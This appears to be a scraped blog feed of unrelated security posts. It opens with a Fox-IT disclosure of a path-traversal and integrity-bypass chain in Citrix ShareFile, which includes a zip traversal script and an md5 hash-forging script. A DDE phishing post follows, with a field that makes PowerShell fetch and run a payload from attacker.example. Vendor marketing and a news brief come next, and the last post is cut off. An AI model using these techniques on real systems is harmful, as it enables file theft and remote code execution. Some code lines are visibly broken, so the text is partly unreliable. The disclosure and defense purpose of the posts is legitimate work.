A while ago we investigated a setup of Citrix ShareFile with an on-premise StorageZone controller. ShareFile is a file sync and sharing solution aimed at enterprises. While there are versions of ShareFile that are fully managed in the cloud, Citrix offers a hybrid version where the data is stored on-premise via StorageZone controllers. This blog describes how Fox-IT identified several vulnerabilities, which together allowed any account to access any file stored within ShareFile. Fox-IT disclosed these vulnerabilities to Citrix, which mitigated them via updates to their cloud platform. The vulnerabilities identified were all present in the StorageZone controller component, and thus cloud-only deployments were not affected. According to Citrix, several Fortune 500 enterprises and organisations in the government, tech, healthcare, banking and critical infrastructure sectors use ShareFile (either fully in the Cloud or with an on-premise component).


Gaining initial access

After mapping the application surface and the flows, we decided to investigate the upload flow and the connection between the cloud and on-premise components of ShareFile. There are two main ways to upload files to ShareFile: one based on HTML5 and one based on a Java Applet. In the following examples we are using the Java based uploader. All requests are configured to go through Burp, our go-to tool for assessing web applications.
When an upload is initialized, a request is posted to the ShareFile cloud component, which is hosted at (where name is the name of the company using the solution):

Initialize upload

We can see the request contains information about the upload, among which is the filename, the size (in bytes), the tool used to upload (in this case the Java uploader) and whether we want to unzip the upload (more about that later). The response to this request is as follows:

Initialize upload response

In this response we see two different upload URLs. Both use the URL prefix (which is redacted here) that points to the address of the on-premise StorageZone controller. The cloud component thus generates a URL that is used to upload the files to the on-premise component.

The first URL is the ChunkUri, to which the individual chunks are uploaded. When the file transfer is complete, the FinishUri is used to finalize the upload on the server. In both URLs we see the parameters that we submitted in the request, such as the filename, file size, et cetera. It also contains an uploadid which is used to identify the upload. Lastly we see a h= parameter, followed by a base64 encoded hash. This hash is used to verify that the parameters in the URL have not been modified.

The unzip parameter immediately drew our attention. As visible in the screenshot below, the uploader offers the user the option to automatically extract archives (such as .zip files) when they are uploaded.

Extract feature

A common mistake made when extracting zip files is not correctly validating the path in the zip file. By using a relative path it may be possible to traverse to a different directory than intended by the script. This kind of vulnerability is known as a directory traversal or path traversal.

The following Python code creates a special zip file containing two files, one of which has a relative path.

import zipfile

# the name of the zip file to generate
zf = zipfile.ZipFile('', 'w')
# the name of the malicious file that will overwrite the original file (must exist on disk)
fname = 'xxe_oob.xml'
# destination path of the file; the relative path escapes the extraction directory
zf.write(fname, '../../../../testbestand_fox.tmp')
# random extra file (not required)
# example: dd if=/dev/urandom of=test.file bs=1024 count=600
fname = 'test.file'
zf.write(fname, 'tfile')
zf.close()

When we upload this file to ShareFile, we get the following message:

ERROR: Unhandled exception in upload-threaded-3.aspx - 'Access to the path '\\company.internal\data\testbestand_fox.tmp' is denied.'

This indicates that the StorageZone controller attempted to extract our file to a directory for which we lacked permissions, but also that we were able to change the directory to which the file was extracted. This vulnerability can be used to write user-controlled files to arbitrary directories, provided the StorageZone controller has privileges to write to those directories. Imagine the default extraction path is c:\appdata\citrix\sharefile\temp\ and we want to write to c:\appdata\citrix\sharefile\storage\subdirectory\: we can add a file named ../storage/subdirectory/filename.txt, which will then be written to the target directory. The ../ part indicates that the operating system should go one directory up in the directory tree and use the rest of the path from that location.

Vulnerability 1: Path traversal in archive extraction
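For contrast, a defensive extraction routine canonicalizes each entry path and refuses anything that escapes the destination directory. The following is a minimal Python sketch (a hypothetical helper, not ShareFile's actual code):

```python
import os
import zipfile

def safe_extract(zf: zipfile.ZipFile, dest: str) -> None:
    """Extract an archive, rejecting members that resolve outside dest."""
    dest = os.path.realpath(dest)
    for member in zf.namelist():
        # canonicalize the would-be target and ensure it stays inside dest
        target = os.path.realpath(os.path.join(dest, member))
        if target != dest and not target.startswith(dest + os.sep):
            raise ValueError('blocked path traversal attempt: %s' % member)
    zf.extractall(dest)
```

With this check in place, a member named ../../../../testbestand_fox.tmp is rejected before anything is written to disk.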

From arbitrary write to arbitrary read

While the ability to write arbitrary files to locations within the storage directories is a high-risk vulnerability, the impact of this vulnerability depends on how the files on disk are used by the application and if there are sufficient integrity checks on those files. To determine the full impact of being able to write files to the disk we decided to look at the way the StorageZone controller works. There are three main folders in which interesting data is stored:

  • files
  • persistentstorage
  • tokens

The first folder, files, is used to store temporary data related to uploads. Files already uploaded to ShareFile are stored in the persistentstorage directory. Lastly the tokens folder contains data related to tokens which are used to control the downloads of files.

When a new upload was initialized, the URLs contained a parameter called uploadid. As the name already indicates this is the ID assigned to the upload, in this case it is rsu-2351e6ffe2fc462492d0501414479b95. In the files directory, there are folders for each upload matching with this ID.

In each of these folders there is a file called info.txt, which contains information about our upload:


In the info.txt file we see several parameters that we saw previously, such as the uploadid, the file name, the file size (13 bytes), as well as some parameters that are new. At the end, we see a 32 character long uppercase string, which hints at an integrity hash for the data.
We see two other IDs, fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 and fo9252b1-1f49-4024-aec4-6fe0c27ce1e6, which correspond with the file ID for the upload and folder ID to which the file is uploaded respectively.

After trying for a while to figure out what kind of hashing algorithm was used for the integrity check of this file, it turned out to be a simple md5 hash of the rest of the data in the info.txt file. The twist is that the data is encoded as UTF-16-LE, the default encoding for Unicode strings on Windows.

Armed with this knowledge we can write a simple python script which calculates the correct hash over a modified info.txt file and write this back to disk:

import hashlib

with open('info_modified.txt', 'r') as infile:
    instr ='|')
instr2 = u'|'.join(instr[:-1])
outhash = hashlib.md5(instr2.encode('utf-16-le')).hexdigest().upper()
with open('info_out.txt', 'w') as outfile:
    outfile.write('%s|%s' % (instr2, outhash))

Here we find our second vulnerability: the integrity of the info.txt file is not verified using a secret known only to the application; it is merely validated against corruption with an md5 hash. This gives an attacker who can write to the storage folders the ability to alter the upload information.

Vulnerability 2: Integrity of data files (info.txt) not verified

Since our previous vulnerability enabled us to write files to arbitrary locations, we can upload our own info.txt and thus modify the upload information.
It turns out that when uploading data, the file ID fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 is used as the temporary name for the file. The uploaded data is written to this file, and when the upload is finalized this file is added to the user’s ShareFile account. We are going to attempt another path traversal here. Using the script above, we modify the file ID to a different filename in an attempt to extract a test file called secret.txt, which we placed in the files directory (one directory above the regular location of the temporary file). The (somewhat redacted) info.txt then becomes:

modified info.txt

When we subsequently post to the upload-threaded-3.aspx page to finalize the upload, we are presented with the following descriptive error:

File size does not match

Apparently, the file size of the secret.txt file we are trying to extract is 14 bytes instead of the 13 that the modified info.txt indicated. We can upload a new info.txt file which does have the correct file size, and the secret.txt file is successfully added to our ShareFile account:

File extraction POC

And thus we’ve successfully exploited a second path traversal, which is in the info.txt file.

Vulnerability 3: Path traversal in info.txt data

By now we’ve turned our ability to write arbitrary files to the system into the ability to read arbitrary files, as long as we know the filename. It should be noted that all the information in the info.txt file can be found by investigating traffic in the web interface, so an attacker does not need to have an info.txt file to perform this attack.

Investigating file downloads

So far, we’ve only looked at uploading new files. The downloading of files is also controlled by the ShareFile cloud component, which instructs the StorageZone controller to serve the requested files. A typical download link looks as follows:

Download URL

Here we see the dt parameter, which contains the download token. Additionally there is an h parameter containing an HMAC of the rest of the URL, to prove to the StorageZone controller that we are authorized to download this file.

The information for the download token is stored in an XML file in the tokens directory. An example file is shown below:

<?xml version="1.0" encoding="utf-8"?>
<ShareFileDownloadInfo authSignature="866f075b373968fcd2ec057c3a92d4332c8f3060" authTimestamp="636343218053146994">
<UserAgent>Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0</UserAgent>
<Item key="operatingsystem" value="Linux" />
<IrmPolicyServerUrl />
<IrmAccessId />
<IrmAccessKey />
<File name="testfile" path="a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37" size="61" id="" />
<ShareID />
</ShareFileDownloadInfo>

Two things are of interest here. The first is the path property of the File element, which specifies which file the token is valid for. The path starts with the ID a4ea881a-a4d5-433a-fa44-41acd5ed5a5f, which is the ShareFile AccountID, unique per ShareFile instance. The second ID, fi0f0f2e_3477_4647_9cdd_e89758c21c37, is unique for the file (hence the fi prefix), with two 0f subdirectories derived from the first characters of the ID (presumably to prevent huge folder listings).
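Based on this observed layout, the on-disk path can presumably be reconstructed from the IDs alone. A hypothetical helper illustrating that assumption (the subfolder rule is inferred from the single example above, not from Citrix documentation):

```python
def storage_path(account_id: str, file_id: str) -> str:
    # Presumed layout: <account>\<c1c2>\<c3c4>\<file id>, where the two
    # subfolders come from the characters following the 'fi' prefix.
    sub1, sub2 = file_id[2:4], file_id[4:6]
    return '\\'.join([account_id, sub1, sub2, file_id])

print(storage_path('a4ea881a-a4d5-433a-fa44-41acd5ed5a5f',
                   'fi0f0f2e_3477_4647_9cdd_e89758c21c37'))
# a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37
```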

The second noteworthy point is the authSignature property on the ShareFileDownloadInfo element. This suggests that the XML is signed to ensure its authenticity, and to prevent malicious tokens from being downloaded.

At this point we started looking at the StorageZone controller software itself. Since it is a .NET program running under IIS, it is trivial to decompile the binaries with tools such as JustDecompile. While we obtained the StorageZone controller binaries from the server the software was running on, Citrix also offers this component as a download on their website.

In the decompiled code, the functions responsible for verifying the token can quickly be found. The feature to have XML files with a signature is called AuthenticatedXml by Citrix. In the code we find that a static key is used to verify the integrity of the XML file (which is the same for all StorageZone controllers):

Static MAC secret

Vulnerability 4: Token XML file integrity not verified

During our research we of course attempted to simply edit the XML file without changing the signature, and it turned out that it is not necessary for an attacker to calculate the signature at all, since the application simply tells you what the correct signature is if it doesn’t match:

Signature disclosure

Vulnerability 5: Debug information disclosure

Furthermore, when we looked at the code that calculates the signature, it turned out that the signature is computed by prepending the secret to the data and calculating a sha1 hash over the result. This makes the signature potentially vulnerable to a hash length extension attack, though we did not verify this in the time available.

Hashing of secret prepended

Even though we didn’t use it in the attack chain, it turned out that the XML files were also vulnerable to XML External Entity (XXE) injection:

XXE error

Vulnerability 6 (not used in the chain): Token XML files vulnerable to XXE

In summary, it turns out that the token files offer another avenue to download arbitrary files from ShareFile. Additionally, the integrity of these files is insufficiently verified to protect against attackers. Unlike the previously described method which altered the upload data, this method will also decrypt encrypted files if encrypted storage is enabled within ShareFile.

Getting tokens and files

At this point we are able to write arbitrary files to any directory we want and to download files if the path is known. The file path however consists of random IDs which cannot be guessed in a realistic timeframe. It is thus still necessary for an attacker to find a method to enumerate the files stored in ShareFile and their corresponding IDs.

For this last step, we go back to the unzip functionality. The code responsible for extracting the zip file is (partially) shown below.

Unzip code

What we see here is that the code creates a temporary directory to which it extracts the files from the archive. The uploadId parameter is used here in the name of the temporary directory. Since we do not see any validation taking place of this path, this operation is possibly vulnerable to yet another path traversal. Earlier we saw that the uploadId parameter is submitted in the URL when uploading files, but the URL also contains a HMAC, which makes modifying this parameter seemingly impossible:


However, let’s have a look at the implementation first. The request initially passes through the ValidateRequest function below:

Validation part 1

Which then passes it to the second validation function:

Validation part 2

What happens here is that the h parameter is extracted from the request, which is then used to verify all parameters in the url before the h parameter. Thus any parameters following the h in the URL are completely unverified!

So what happens when we add another parameter after the HMAC? When we modify the URL as follows:


We get the following message:

{"error":true,"errorMessage":"upload-threaded-2.aspx: ID='rsu-becc299a4b9c421ca024dec2b4de7376,foxtest' Unrecognized Upload ID.","errorCode":605}

So what happens here? Since the uploadid parameter is specified multiple times, IIS concatenates the values, separated with a comma. Only the first uploadid parameter is verified by the HMAC, since the check operates on the query string rather than on individual parameter values, and only covers the portion of the string before the h parameter. This type of vulnerability is known as HTTP Parameter Pollution.

Vulnerability 7: Incorrectly implemented URL verification (parameter pollution)

Looking at the upload logic again, the code calls the function UploadLogic.RecursiveIteratePath after the files are extracted to the temporary directory, which recursively adds all the files it can find to the ShareFile account of the attacker (some code was cut for readability):

Recursive iteration

To exploit this, we need to do the following:

  • Create a directory called rsu-becc299a4b9c421ca024dec2b4de7376, in the files directory.
  • Upload an info.txt file to this directory.
  • Create a temporary directory called ulz-rsu-becc299a4b9c421ca024dec2b4de7376,.
  • Perform an upload with an added uploadid parameter pointing us to the tokens directory.

The creation of directories can be performed with the directory traversal that was initially identified in the unzip operation, since this will create any non-existing directories. To perform the final step and exploit the third path traversal, we post the following URL:

Upload ID path traversal

Side note: we use tokens_backup here because we didn’t want to touch the original tokens directory.

Which returns the following result that indicates success:

Upload ID path traversal result

Going back to our ShareFile account, we now have hundreds of XML files with valid download tokens available, which all link to files stored within ShareFile.

Download tokens

Vulnerability 8: Path traversal in upload ID

We can download these files by modifying the path in our own download token files for which we have the authorized download URL.
The only side effect is that adding files to the attacker’s account this way also recursively deletes all files and folders in the temporary directory. By traversing the path to the persistentstorage directory it is thus also possible to delete all files stored in the ShareFile instance.


By abusing a chain of correlated vulnerabilities it was possible for an attacker with any account allowing file uploads to access all files stored by the ShareFile on-premise StorageZone controller.

Based on our research that was performed for a client, Fox-IT reported the following vulnerabilities to Citrix on July 4th 2017:

  1. Path traversal in archive extraction
  2. Integrity of data files (info.txt) not verified
  3. Path traversal in info.txt data
  4. Token XML file integrity not verified
  5. Debug information disclosure (authentication signatures, hashes, file size, network paths)
  6. Token XML files vulnerable to XXE
  7. Incorrectly implemented URL verification (parameter pollution)
  8. Path traversal in upload ID

Citrix was quick to follow up on the issues, rolling out mitigations by disabling the unzip functionality in the cloud component of ShareFile. While Fox-IT identified several major organisations and enterprises that use ShareFile, it is unknown whether they were using the hybrid setup in a vulnerable configuration. Therefore, the number of affected installations, and whether these issues were abused, is unknown.

Disclosure timeline

  • July 4th 2017: Fox-IT reports all vulnerabilities to Citrix
  • July 7th 2017: Citrix confirms they are able to reproduce vulnerability 1
  • July 11th 2017: Citrix confirms they are able to reproduce the majority of the other vulnerabilities
  • July 12th 2017: Citrix deploys an initial mitigation for vulnerability 1, breaking the attack chain. Citrix informs us the remaining findings will be fixed on a later date as defense-in-depth measures
  • October 31st 2017: Citrix deploys additional fixes to the cloud-based ShareFile components
  • April 6th 2018: Disclosure

CVE: To be assigned

DDE Exploitation – Macros Aren’t the Only Thing You Should be Counting

Exploitation of the Microsoft® Dynamic Data Exchange (DDE) protocol is increasingly being used to launch malicious code in weaponized email attachments. A native feature of Microsoft Windows and Office, DDE allows data to be pulled from other sources, such as updating a spreadsheet from an external database. As with many features, DDE can be leveraged for malicious purposes.

Old Dog, New Tricks

Malicious email attachments are nothing new, but the traditional attack vector has been via macros embedded into the files. Macros are simply shortcuts for sequences of commands and/or keystrokes. Studies show that at least a quarter of phishing attempts involve malicious macros embedded in Microsoft Office documents. As noted by the SANS Internet Storm Center, “…attackers are using DDE because it’s different. We’ve been seeing the same macro-based attacks for years now, so perhaps criminals are trying something different just to see if it works any better.”

Apparently, DDE exploitation does work, as observed in several malware campaigns, including distribution of Locky ransomware through the Necurs botnet and also in the spread of the Hancitor downloader. The technique was also used against Fannie Mae employees in October 2017, when attackers sent phishing emails promising free tickets to a Halloween event at a local Six Flags amusement park. More recently, DDE exploitation was found being used in the Dridex banking trojan to execute a shell command to download malware. It was also used in association with the distribution of the Zyklon backdoor.

Of Course, There’s a Metasploit Module for That

The DDE exploit can be created using custom Metasploit modules available through GitHub and other sources. The LookingGlass™ research team tested a module designed to open a backdoor communication channel (reverse shell) between the victim and attacker.

Once the exploit is configured, the next step is crafting the malicious Microsoft Office document. This is done by inserting a coded field that contains the output from the Metasploit DDE module.

DDE exploit embedded in Word Document


Syntax of the code in our test case is as follows:

DDE Exploit Code
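As a rough illustration (not the exact payload from our test case), publicly documented DDE abuse embeds a Word field of this general shape, where the command and server address below are placeholders:

```
{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell.exe -w hidden -NoP IEX((New-Object Net.WebClient).DownloadString('http://attacker.example/payload.hta'))" }
```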

The document is then sent to victims, typically via a phishing email, and targets Microsoft Word on a Windows operating system. When the victim opens the document, they are presented with a pop-up that prompts them to “update” the document with data from linked files. The default response is no, but if the user clicks yes, the malicious code is launched using the Microsoft HTML Application Host (mshta.exe) and PowerShell to retrieve the HTML Application (HTA) payload from the remote server.

DDE Exploit Pop-Up Window


In our test case, the code enabled a connection back to our “attack” server. From that session, we were able to remotely run commands and upload and download files. This activity was not readily observable from the victim computer. Interestingly, the connection remains open even if the document is closed.

Established Connection Between Victim and Attacker


File Download Example

Avoiding the DDE Phishing Hook

Unfortunately, infected files are not easy to write signatures for, since the exploits can vary widely in syntax and the documents themselves can contain a variety of text and images.

If you are a systems admin or IT practitioner, here are some things you can do to protect your organization’s network:

  • Use Windows Defender, which can detect the use of DDE exploits; you can also turn off DDE itself in the Windows registry
  • Monitor outbound connections, particularly on unusual ports
  • Provide phishing education to your users
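As a concrete sketch of the registry option: Microsoft's advisory ADV170021 introduced an AllowDDE value for Office applications. The command below assumes Office 16.0; the version key varies by installation, so verify it against the current Microsoft guidance before deploying:

```shell
:: Disable DDE execution in Word (Office version key 16.0 assumed)
reg add "HKCU\Software\Microsoft\Office\16.0\Word\Security" /v AllowDDE /t REG_DWORD /d 0 /f
```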

At this point, we all know cyber threats are becoming more sophisticated and targeted. Creating a culture of security in your organization and practicing basic cyber hygiene are the easiest and fastest ways to keep your networks clean and the bad guys out.

Want more insights like this into new vulnerabilities and exploits? Learn more here.

Marcelle Lee is a LookingGlass threat researcher who is active in the cybersecurity community. Check out her upcoming speaking opportunities here and reach out to her on Twitter at @Marcelle_FSG.



Don’t Get Caught Up in the Hype of AI for Security

Don't get caught up in the hype of artificial intelligence or machine learning. Does the product correlate and analyze alerts?

When Nails are Exciting, Everyone Wants to Talk about Hammers...

Sticking with the tool theme from my last post, data is ushering in "better" products in every industry, but why are we so enamored with Artificial Intelligence and Machine Learning?



Soon you'll be able to make coffee where the temperature and grind are tuned to the particular bean and roast you are using. The connected coffee maker will crowdsource ratings from all its owners, analyze the data collected, and produce insights and recommendations that are then fed back down to your coffee maker - all in support of a better cup of coffee.

These types of use-cases of data are very exciting to me. The downside is that although I'm a big fan of coffee -- and think this type of technology is pretty cool -- most people don't need to worry about how the sausage, I mean the coffee, is made. They simply want a better cup of joe.  

At the RSA Conference in a couple of weeks, you're going to see many cyber security companies talking about their Artificial Intelligence (AI) and Machine Learning (ML). Here is an example of how one company might speak about their product when you ask them what they do.  "...applies AI and machine learning to automate the correlation and analysis of threats."

Frankly, I don't -- and you shouldn't -- care about their usage of AI or ML. The real question to ask the vendor is: does the product correlate and analyze alerts, and can they prove that their product does it better than their competitors?

Now, you're thinking, doesn't ThreatConnect do analytics and don't you say that your Platform is better because of the data and analytics you are using?  The answer is yes and yes. But, we are honest about what our analytics do and don't do, and we absolutely don't throw around terms like AI and ML with our customers as value propositions by themselves.

Our focus at ThreatConnect has been to leverage our real world experiences, and those of our customers, to scale repeatable processes that help you understand your data. We're less focused on buzzwords that might trigger your news alerts. Rest assured, we've designed these repeatable processes both within the Platform and in CAL™ (Collective Analytics Layer) to make a great cup of coffee. Our data scientists have curated these analytics and statistical models to score indicators, provide insights across datasets, and improve our ability to confidently recommend actions. For the sake of mankind, we hope to never build the fancy newest "Skynet machine learning algorithm." What we will do is use data and analytics (and hype-free marketing) to promote security automation and decision-making in a pragmatic, achievable, and non-world-ending-killing-machines way.  

The post Don't Get Caught Up in the Hype of AI for Security appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

When You’re a Platform, Everything Else is a Tool

Use a Platform to adapt to the changing threat landscape and your evolving security organization

I am a computer scientist and purist when it comes to the vocabulary I use in technical discussions. Often (almost daily it feels like) I find myself talking about the difference between tools and platforms.  

Tools are designed from predefined requirements and are meant to fulfill the need for which they were designed. Conversely, platforms are designed to enable a continuous design-and-build process by people outside of the company that built the underlying platform. For example, your smartphone and computer are platforms, while your pen is a tool. Even a really impressive pen with multiple ink colors is still a pen.





 Storing Data and making it available via an API does NOT make you a platform!






The ThreatConnect Platform was designed to allow the underlying data model to be extended without development. Developers need the ability to update the data model to account for their own unique use-cases. This provides the ability to quickly and simply integrate with existing products and to bring together multiple disparate datasets for normalization, correlation, and analysis. Integrations with the underlying data model are made possible through multiple APIs that may facilitate data transfer and/or command and control with external systems.  
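To make the idea concrete, here is a minimal, hypothetical sketch (plain Python, not ThreatConnect's actual implementation) of a data model that integrations can extend at runtime without schema changes:

```python
class Indicator:
    """A core indicator record with an open-ended attribute map,
    so integrations can extend the model without code changes."""

    def __init__(self, summary: str, indicator_type: str):
        self.summary = summary
        self.type = indicator_type
        self.attributes: dict[str, str] = {}

    def add_attribute(self, name: str, value: str) -> None:
        # Any integration can attach its own fields at runtime.
        self.attributes[name] = value


# An integration adds fields the original schema never anticipated.
ioc = Indicator("mvtband[.]net", "Host")
ioc.add_attribute("Source", "Passive DNS")
ioc.add_attribute("Campaign", "Fancy Bear")
```

The point is that the extension lives in data, not in code: a new dataset brings its own attributes along instead of requiring a new release of the platform.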





Having a SDK that allows a developer to more easily integrate with your API does NOT make you a platform!  






The ThreatConnect Platform includes Software Development Kits (SDKs) for Python, Java, and JavaScript/TypeScript. SDKs increase accessibility by abstracting APIs and the complexity of building Apps for ThreatConnect into a general purpose language. For example, the SDK allows Apps to be developed that leverage the entire ThreatConnect data model as well as critical Logging, Keychain, Notification, DataStore, ThreatConnect Query Language (TQL), and Metrics functions of the underlying platform.




Applications or Apps - Now we start getting into a place where your software might be a platform. The most important question: can your customers, partners, friends, and family build on top of your software? If yes - hurray, you are probably a platform. If no - you are NOT a platform, and likely a "tool" for thinking you were.






The ThreatConnect Platform allows anyone to build and run their own Apps that extend ThreatConnect's capabilities by connecting to external systems and to ThreatConnect APIs. This allows the platform to be enhanced AFTER it has been deployed. Apps take advantage of ThreatConnect's horizontally and vertically scalable, messaging-driven architecture.







Is the only way to extend a platform to write code? No, with playbooks or similar designer and runtime capabilities, you can extend the platform based on your own ideas and do so without needing to be a developer.






The ThreatConnect Platform's Playbooks capability allows a sequence of automated or human tasks, arranged as a process, to be configured as a playbook, executed to incorporate automated analytics or human workflows, and measured to support continuous improvement. These playbooks, along with dashboards and apps, can be shared and utilized by anyone in the ThreatConnect community.
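As an illustration of the concept (a hypothetical sketch, not ThreatConnect's Playbooks engine), a playbook can be modeled as an ordered list of steps that pass an event along and are timed so the process can be measured and improved:

```python
import time
from typing import Callable


def run_playbook(steps: list, event: dict):
    """Run each step in order, passing the event along and timing
    every step to support continuous improvement."""
    timings = {}
    for step in steps:
        start = time.perf_counter()
        event = step(event)
        timings[step.__name__] = time.perf_counter() - start
    return event, timings


# Hypothetical steps: enrich an alert, score it, decide on an action.
def enrich(e):
    return {**e, "owner": "SOC"}

def score(e):
    return {**e, "score": 85 if e["indicator"].endswith("[.]net") else 10}

def decide(e):
    return {**e, "action": "block" if e["score"] >= 50 else "monitor"}


result, timings = run_playbook([enrich, score, decide], {"indicator": "mvtband[.]net"})
```

Each step is a plain function, so non-developers can assemble new processes from existing building blocks rather than writing code from scratch.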

The ThreatConnect Platform was built to adapt to a changing landscape of threats and an evolving security organization and marketplace.  

Over the last 7 years, we built a platform vs. a tool because only one thing is certain in security - change is inevitable.

The post When You're a Platform, Everything Else is a Tool appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Elevating Your Security Posture with Threat-Intelligence-as-a-Service

Every enterprise organization is in a security arms-race that it must win. As technology becomes ever more intertwined with every business process and every element of the customer experience, the impact of a security breach becomes catastrophic.

Of course, every enterprise already knows this.

The question, however, is what to do about it when the organization must also evolve and expand its technology stack to meet the insatiable needs of its customers and the market.

As the attack surfaces continue to proliferate, enterprises cannot turn away or let their guard down. Instead, they must find a way to continually elevate their security posture and get ahead of the bad actors who are, likewise, continually seeking a vulnerability that will give them an opening.

A more efficient and effective way of approaching cybersecurity promises to help enterprises get the upper hand in this game of cat-and-mouse by identifying emerging threats before an attack begins — and delivering this intelligence in an actionable form without the overhead. The approach? Threat-intelligence-as-a-service.

The Losing Battle for Containment

When it comes to an organization’s security posture, there’s a natural evolution that occurs. The first stage of evolution is all about containment and perimeter security.

In this first stage, the focus is on establishing a perimeter, securing it and then containing any further exposure. This need for containment is so that organizations can define the theater of engagement — ensuring that what’s inside is safe so they can focus resources on protecting the perimeter.

This type of first-stage security posture has been the predominant focus of IT organizations. But this kind of security posture only works when you can effectively define and contain your perimeter — or, as it is also called, your attack surface.

As your attack surface expands or changes, especially when it is doing so at a rapid rate, containment becomes almost impossible. In these situations of an uncontainable attack surface — precisely what is happening now in the era of digital transformation —  the organization must evolve its security posture to the next level. The question is how?

Why Threat Intelligence is in Your as-a-Service Future

The natural response to dealing with an expanding attack surface is to keep doing the same things – just faster and more expansively. This approach, however, is not only exhausting, it’s ineffective.

It’s a bit like trying to keep all the plates spinning on their poles – it’s only a matter of time before it all comes crashing down.

Organizations must, therefore, find a way to identify threats before they ever reach their dynamic and expanding perimeter and then respond preemptively. We call this concept of identifying threats before a security event happens threat intelligence.

On the surface, employing threat intelligence sounds like the next logical step to proactively protect the organization’s hard-to-contain perimeter. But doing so is much harder than it sounds.

Identifying emerging threats to the enterprise, without creating a debilitating surge of false-positive alerts, requires equal measures of intelligence information, triage capabilities, and expertise to identify indicators that represent a threat to the enterprise.
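One common triage tactic for holding down false positives is to require corroboration and minimum confidence before raising an alert; a minimal sketch (thresholds and feed names are hypothetical):

```python
def triage(indicators, min_sources=2, min_confidence=60):
    """Keep only indicators corroborated by enough independent sources
    with sufficient confidence, suppressing likely false positives."""
    return [
        i for i in indicators
        if len(i["sources"]) >= min_sources and i["confidence"] >= min_confidence
    ]


raw = [
    # Single-source: plausible, but uncorroborated.
    {"indicator": "203.0.113.7", "sources": ["feed-a"], "confidence": 90},
    # Corroborated by an external feed and internal DNS logs.
    {"indicator": "mvtband[.]net", "sources": ["feed-a", "internal-dns"], "confidence": 80},
    # Corroborated but low confidence.
    {"indicator": "198.51.100.2", "sources": ["feed-a", "feed-b"], "confidence": 30},
]

alerts = triage(raw)
```

Tuning those two thresholds is exactly the mixture of science and art the paragraph describes: too strict and real threats are missed, too loose and the alert surge returns.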

Delivering effective threat intelligence is a mixture of science and art – and a capability that many enterprises are finding difficult and expensive to build in-house.

Threat Intelligence-as-a-Service, however, promises to deliver the threat intelligence capabilities that enterprises need, without the cost and overhead of building it themselves. Utilizing a managed service for threat intelligence will help enterprises develop this now-essential capability while minimizing the resource impact to the organization.

The Intellyx Take

It may be discomforting for enterprise executives to hear that they need to elevate their security posture and expand their already resource-strapped security operations further afield.

Creating a threat intelligence capability is not the core business of most enterprises. It is nevertheless essential for enterprise leaders to take an active response posture and engage threats far beyond their continuously evolving perimeter. Doing so, however, requires intelligence about those threats and the skills and expertise to make sense from the intelligence data.

This need for intelligence, coupled with the desire not to build and manage a threat intelligence capability in-house, is why enterprises are now turning to industry pioneers such as LookingGlass and their threat-intelligence-as-a-service offerings to strike this balance by outsourcing this critical capability.

There is no question that the security arms-race is continuing to escalate. The bad actors are well-funded, organized and ambitious. Enterprise organizations must respond in-kind, but must do so intelligently.

While an enterprise can never outsource its security responsibility, it can and should seek to leverage outside resources that can extend its capabilities in the most resource-efficient manner possible. As the fight between enterprises and those who wish to do them harm continues, enterprise leaders will need every advantage they can muster.


Copyright © Intellyx LLC. LookingGlass is an Intellyx client. Intellyx retains full editorial control over the content of this paper.

The post Elevating Your Security Posture with Threat-Intelligence-as-a-Service appeared first on LookingGlass Cyber Solutions Inc..

Weekly Threat Intelligence Brief: March 27, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“Expedia subsidiary Orbitz today revealed hackers may have accessed personal information from about 880,000 payment cards. The business said an investigation showed that the breach may have occurred between Jan. 1, 2016 and Dec. 22, 2017 for its partner platform, and between Jan. 1, 2016 and June 22, 2016 for its consumer platform. Information such as names, phone numbers, email and billing addresses may have been accessed, the travel website operator said. It said its website was not impacted. “To date, we do not have direct evidence that this personal information was actually taken from the platform and there has been no evidence of access to other types of personal information, including passport and travel itinerary information,” Orbitz said. The company said it has addressed the breach after it was discovered in March this year. Credit card issuer American Express said in a statement that the attack did not compromise its platforms.”



“Dozens of demonstrators were arrested and three police officers were injured during protests at the Kinder Morgan site in Burnaby this week. Mounties said at least a dozen people were arrested on Shellmont Street Tuesday, many of whom had breached a court-ordered injunction involving the Trans Mountain facility. The arrests came a day after 19 people were arrested at a similar protest, 13 of whom had breached the injunction. One male protester was arrested after locking himself to the front of an excavator being transported on the back of a truck. He was extracted from the lock and held in civil contempt of a court ordered injunction. A woman was arrested after climbing on top of the same excavator and refusing to come down. She eventually did climb down after what RCMP described as “hours of negotiation.””


Information Security Risk

“Facebook says it has suspended the account of Cambridge Analytica amid reports it harvested the profile information of millions of US voters without their permission. The company reportedly stole information from 50 million Facebook users’ profiles, to help them design software to predict and influence voters’ choices at the ballot box. Also suspended were the accounts of its parent organization, Strategic Communication Laboratories, as well as those of two University of Cambridge psychologists and a Canadian data analytics expert who worked with them. The premise of the collection was through the use of an app, which offered a personality prediction test, describing itself on Facebook as “a research app used by psychologists.” Some 270,000 people downloaded the app allowing researchers to access information such as the city listed on their profile, or content they had “liked.” However, the app also collected the information of the test-takers’ Facebook friends, leading to the accumulation of a data pool tens of millions-strong.”

The Guardian

Operational Risk

“A new variant of the FakeBank Android malware includes the ability to intercept phone calls victims are making to their banks and redirecting users to scammers. This new FakeBank variant is currently active in South Korea, researchers said. Experts found the FakeBank banking trojan inside 22 Android apps distributed via third-party app stores and via links shared on social media sites.”

The post Weekly Threat Intelligence Brief: March 27, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Camouflage & Deception: A New Approach to Threat Mitigation

Organizations face threats that range from annoyances to sophisticated attacks crafted by adversaries with intention and forethought about their objectives. The prevalence of exploit kits, malware, and botnet toolkits shared by bad actors across the Internet and Dark Net makes it easier for actors to build more sophisticated threats.

How can security teams disrupt adversarial activities more effectively?

It is no longer enough for our threat response to focus solely on detection and blocking. We need cyber defenses that will disrupt the threat activities of an adversary.

